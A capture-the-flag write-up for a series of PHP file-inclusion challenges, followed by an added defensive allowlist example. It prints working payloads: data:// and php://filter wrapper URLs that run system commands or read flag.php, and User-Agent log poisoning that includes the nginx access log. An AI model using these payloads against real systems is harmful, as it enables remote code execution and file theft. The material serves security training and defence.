CTF-Show File Inclusion Series
Problem 1
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 10:52:43
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}
Bypass with the data:// wrapper or the php:// wrapper.
Access directly:
data:// wrapper: http://013afa34-19ec-4bb3-8296-b5d7395e1c28.challenge.ctf.show/?file=data://text/plain,%3C?php%20echo%20system(%22tac%20flag.php%22);?%3E
php:// wrapper: ?file=php://filter/convert.base64-encode/resource=flag.php
The flag is obtained:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 10:55:11
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 10:55:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{4d9280cd-8ec9-4605-adf1-be02df690ff8}";
Problem 2
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:10:14
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
    $file = $_GET['file'];
    // the php wrapper is filtered
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
Bypass using the data:// wrapper plus PHP short tags:
http://1806c891-e5a0-40f8-8a62-1dcd6b73e508.challenge.ctf.show/?file=data://text/plain,%3C?=system(%22tac%20fla*%22);?%3E
Bypass using the data:// wrapper plus base64 encoding:
http://1806c891-e5a0-40f8-8a62-1dcd6b73e508.challenge.ctf.show/?file=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oInRhYyBmbGFnLnBocCIpPz4=
Problem 3
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
    $file = $_GET['file'];
    // the php and data wrappers are filtered
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
Bypass via log file inclusion.
First write the payload through the User-Agent header, then include the log file (/var/log/nginx/access.log) to get the flag.
We can first list the files by injecting through the User-Agent header:
payload:<?php echo system(ls)?>
Note: ls must not be quoted here, otherwise a constant error is reported.
We find that the file is named fl0g.php.
Next, read it by injecting through the User-Agent header:
payload:<?php echo system('tac fl0g.php')?>
The flag is obtained.
Problem 4
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 15:51:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
    $file = $_GET['file'];
    // on top of the previous problem, the colon is also filtered
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
Log file inclusion still works as the bypass.
Problem 5
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
    $file = $_GET['file'];
    // on top of the previous problem, the dot is also filtered
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
Summary
Common file inclusion bypass techniques:
- php:// wrapper
- data:// wrapper
- Log file inclusion
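A defensive counterpart to the problems above, added here and not part of the original write-up: the str_replace blacklist the challenges use, beside an allowlist-based include that none of the three bypasses reaches. The ./pages/ directory, the page names and the helper names are assumptions.

```php
<?php
// Added defensive example, not code from the CTF-Show challenges: the
// str_replace blacklist from the problems above, then an allowlist include
// that gives wrappers and log files no way in. Assumed layout: pages live
// in ./pages/<name>.php and only the bare names in ALLOWED_PAGES are accepted.

// Weak: a keyword blacklist. Every bypass in the write-up (short tags,
// base64 data://, including /var/log/nginx/access.log) gets through,
// because include() still receives an attacker-controlled string.
function include_blacklist(string $file): void
{
    $file = str_replace(["php", "data", ":"], "???", $file);
    include($file);
}

const ALLOWED_PAGES = ["home", "about", "contact"]; // assumed page names

// Hardened: map the request onto a fixed allowlist and confine the
// resolved path to the pages directory before it reaches include().
function resolve_page(string $name, string $base): ?string
{
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null; // wrappers, "../" and log paths all stop here
    }
    $baseReal = realpath($base);
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . ".php");
    // realpath() is false for a missing file or directory; the prefix
    // check also blocks a symlink inside pages/ that points outside it.
    if ($baseReal === false || $path === false
        || strpos($path, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function include_allowlist(string $name): void
{
    $path = resolve_page($name, __DIR__ . "/pages");
    if ($path === null) {
        http_response_code(404);
        return;
    }
    include $path;
}

// The inputs from the write-up never resolve to a file:
foreach (["php://filter/convert.base64-encode/resource=flag.php",
          "/var/log/nginx/access.log", "../flag"] as $p) {
    var_dump(resolve_page($p, __DIR__ . "/pages")); // NULL each time
}
```

Independently of the application code, allow_url_include=Off in php.ini disables the data:// and php://input wrappers for include(); php://filter is not covered by that setting, which is why the allowlist is still needed.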